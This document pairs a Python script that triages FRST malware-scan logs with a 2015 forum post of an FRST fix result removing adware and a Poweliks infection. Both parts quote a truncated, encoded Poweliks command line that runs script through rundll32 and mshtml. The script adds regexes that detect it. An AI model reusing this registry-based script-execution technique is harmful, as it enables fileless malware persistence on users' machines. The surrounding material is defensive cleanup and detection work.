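import re
from dataclasses import dataclass

# Lines copied from the FRST output quoted in this thread (first line is a benign task for contrast).
SAMPLE_LOG = r'''Task: {E75DA587-9600-4EAA-9EC5-A02AA70080E5} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-23] (Google Inc.)
Task: {D75E9E91-7C7C-4DF6-BBC9-E43DD2B730FE} - System32\Tasks\{ABED2CE2-1675-45C7-94E4-95CFBF59971C} => pcalua.exe -a "C:\Users\April\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8AYHR0JK\do-download[1].exe" -d C:\Users\April\Desktop
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{039B2CA5-3B41-4D93-AD77-47D3293FC5CB}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
'''

GUID = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")
# A COM server registration key (per-user CLSID entries appear as CustomCLSID in the log).
COM_SERVER = re.compile(r"\\(?:localserver32|inprocserver32)\b", re.I)
# rundll32 handed a script protocol instead of a DLL path.
SCRIPT_HANDLER = re.compile(r"\brundll32(?:\.exe)?\s+(?:javascript|vbscript):", re.I)
# Executables started from browser cache or temp folders.
CACHE_PATH = re.compile(r"\\Temporary Internet Files\\|\\AppData\\Local\\Temp\\", re.I)
# Target of a scheduled task, with or without the pcalua.exe -a wrapper.
TASK_TARGET = re.compile(r'=>\s*(?:pcalua\.exe\s+-a\s+)?"?([^"]+?\.exe)', re.I)
# First argument of eval(" as far as the log shows it (FRST truncates the value).
EVAL_ARG = re.compile(r'eval\("(\S+)')


@dataclass
class Finding:
    line_no: int
    severity: str
    rule: str
    guid: str
    detail: str


def shift_decode(text, delta=-1):
    """Shift every character by delta code points (assumption: a simple per-character shift)."""
    return "".join(chr(ord(c) + delta) for c in text)


def triage(log_text):
    """Return findings for FRST-style lines, in log order."""
    findings = []
    for line_no, raw in enumerate(log_text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        match = GUID.search(line)
        guid = match.group(0).upper() if match else ""
        if COM_SERVER.search(line) and SCRIPT_HANDLER.search(line):
            # The pattern flagged as Poweliks in the thread: the COM server
            # "path" is a rundll32 command line that evaluates script.
            arg = EVAL_ARG.search(line)
            detail = shift_decode(arg.group(1)) if arg else ""
            findings.append(Finding(line_no, "high", "com-server-script-handler", guid, detail))
        elif line.startswith("Task:") and CACHE_PATH.search(line):
            # Heuristic of this example only; the thread's fixlist leaves these tasks alone.
            target = TASK_TARGET.search(line)
            detail = target.group(1) if target else ""
            findings.append(Finding(line_no, "review", "task-runs-from-browser-cache", guid, detail))
        elif line.startswith("CustomCLSID:") and line.endswith("No File"):
            # Registration whose target file is gone: leftover, not active code.
            findings.append(Finding(line_no, "low", "orphaned-com-registration", guid, ""))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"line {f.line_no}: [{f.severity}] {f.rule} {f.guid} {f.detail}")
```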

#14
JUSTME1969


    Member

  • Topic Starter
  • Member
  • 32 posts

Should the FRST fix be taking a lot of time? It has been running 15 minutes or more. Just checking to make sure :)


  • 0

#15
JUSTME1969


    Member

  • Topic Starter
  • Member
  • 32 posts

It looks as if Farbar is still running but it did produce a log. Should I close Farbar out and start next step or is this normal? At the top of the Farbar window it says deleting temporary files.

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 01-01-2015
Ran by April at 2015-01-02 01:08:37 Run:1
Running from C:\Users\April\Desktop
Loaded Profile: April (Available profiles: April)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
Start
CreateRestorePoint:
CloseProcesses:
(Coupons.com Inc.) C:\Program Files\Coupons\CouponPrinterService.exe
C:\Program Files\Coupons
HKLM\...\Run: [] => [X]
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\MountPoints2: {6f766fac-5ca7-11e1-ba6a-001e33ff5421} - E:\setup.exe -a
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\MountPoints2: {952aea8a-075f-11e3-a52c-001e33ff5421} - E:\setup.exe -a
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\MountPoints2: {97b3e8bf-0fa5-11e1-8250-001e33ff5421} - F:\setup.exe -a
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
CHR HKU\S-1-5-21-692471023-1834078390-643647909-1001\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\Microsoft\Internet Explorer\Main,Start Page Restore = http://www.startpage.com/
FF Plugin HKU\S-1-5-21-692471023-1834078390-643647909-1001: CouponNetwork.com/CMDUniversalCouponPrintActivator -> C:\Users\April\AppData\Roaming\CATALI~2\NPBCSK~1.DLL No File
C:\Users\April\AppData\Roaming\CATALI~2
R2 CouponPrinterService; C:\Program Files\Coupons\CouponPrinterService.exe [152560 2014-02-13] (Coupons.com Inc.)
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{039B2CA5-3B41-4D93-AD77-47D3293FC5CB}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{42481700-CF3C-4D05-8EC6-F9A1C57E8DC0}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{AD848A76-F236-5EE2-819B-2BDE7ED40AE7}\InprocServer32 -> C:\Users\April\AppData\Roaming\Catalina Print Savings\npBcsKtTcHW.dll No File
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{D0D38C6E-BF64-4C42-840D-3E0019D9F7A6}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
CMD: ipconfig /flushdns
Emptytemp:
Hosts:
End
*****************

Restore point was successfully created.
Processes closed successfully.
[360] C:\Program Files\Coupons\CouponPrinterService.exe => Process closed successfully.
C:\Program Files\Coupons => Moved successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{6f766fac-5ca7-11e1-ba6a-001e33ff5421}" => Key deleted successfully.
HKCR\CLSID\{6f766fac-5ca7-11e1-ba6a-001e33ff5421} => Key not found.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{952aea8a-075f-11e3-a52c-001e33ff5421}" => Key deleted successfully.
HKCR\CLSID\{952aea8a-075f-11e3-a52c-001e33ff5421} => Key not found.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{97b3e8bf-0fa5-11e1-8250-001e33ff5421}" => Key deleted successfully.
HKCR\CLSID\{97b3e8bf-0fa5-11e1-8250-001e33ff5421} => Key not found.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key deleted successfully.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001\SOFTWARE\Policies\Google" => Key deleted successfully.
HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\Microsoft\Internet Explorer\Main\\Start Page Restore => value deleted successfully.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\MozillaPlugins\CouponNetwork.com/CMDUniversalCouponPrintActivator" => Key deleted successfully.
C:\Users\April\AppData\Roaming\CATALI~2\NPBCSK~1.DLL not found.
"C:\Users\April\AppData\Roaming\CATALI~2" => File/Directory not found.
CouponPrinterService => Service deleted successfully.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{039B2CA5-3B41-4D93-AD77-47D3293FC5CB}" => Key deleted successfully.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{42481700-CF3C-4D05-8EC6-F9A1C57E8DC0}" => Key deleted successfully.
HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} => Key not found.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{AD848A76-F236-5EE2-819B-2BDE7ED40AE7}" => Key deleted successfully.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{D0D38C6E-BF64-4C42-840D-3E0019D9F7A6}" => Key deleted successfully.

=========  netsh advfirewall reset =========

Ok.

========= End of CMD: =========

=========  netsh advfirewall set allprofiles state on =========

Ok.

========= End of CMD: =========

=========  ipconfig /flushdns =========

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========

C:\Windows\System32\Drivers\etc\hosts => Moved successfully.
Hosts was reset successfully.

 

 

 


Edited by JUSTME1969, 02 January 2015 - 12:44 AM.

  • 0





